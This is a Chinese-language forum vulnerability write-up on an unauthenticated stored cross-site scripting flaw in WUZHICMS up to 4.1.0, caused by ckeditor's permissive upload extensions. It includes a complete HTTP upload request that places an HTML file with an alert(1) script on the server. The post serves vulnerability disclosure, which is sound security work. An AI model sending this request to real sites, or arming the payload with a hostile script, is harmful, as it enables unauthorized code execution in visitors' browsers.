WUZHICMS 4.1.0 中存储的跨脚本漏洞

影响:<=4.1.0

ckeditor 是第三方网页编辑器。并且您可以看到它的默认文件扩展名(在文件 `coreframe/app/attachment/libs/class/ckditor.class.php` 中)包含一些扩展名,这些扩展名可以在特定文件时由浏览器(例如 Google Chrome)执行为 html可以在web目录下访问。

图片[1]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

并且这个 cms 允许在没有用户身份验证的情况下上传文件,因此访客可以上传特定文件。

4.0.0

POST /index.php?m=attachment&f=index&v=ckeditor&action=uploadfile&CKEditor=content&CKEditorFuncNum=0&langCode=zh-cn&responseType=json HTTP/1.1
Host: 192.168.1.58

Content-Length: 232
Origin: http://192.168.1.58
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3806.1 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypYLApmLtKBESAKEg
Accept: */*
Referer: http://192.168.1.58/index.php?m=attachment&f=index&v=upload_dialog&callback=callback_ck_images&htmlid=content&limit=10&htmlname=form%5Bthumb%5D&ext=jpg|png|gif&token=c3bc987cbbe8894cf67bfe282f1c002b&_menuid=26
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-HK;q=0.7,zh-CN;q=0.6,zh-TW;q=0.5
Cookie: username=fxxx
Connection: close

------WebKitFormBoundarypYLApmLtKBESAKEg
Content-Disposition: form-data; name="upfile"; filename="xx.md"
Content-Type: application/octet-stream

<html><script>alert(1)</script></html>
------WebKitFormBoundarypYLApmLtKBESAKEg--

图片[2]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

图片[3]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

In 4.1.0

图片[4]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区

图片[5]-WUZHICMS 4.1.0 中存储的跨脚本漏洞-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像卡角0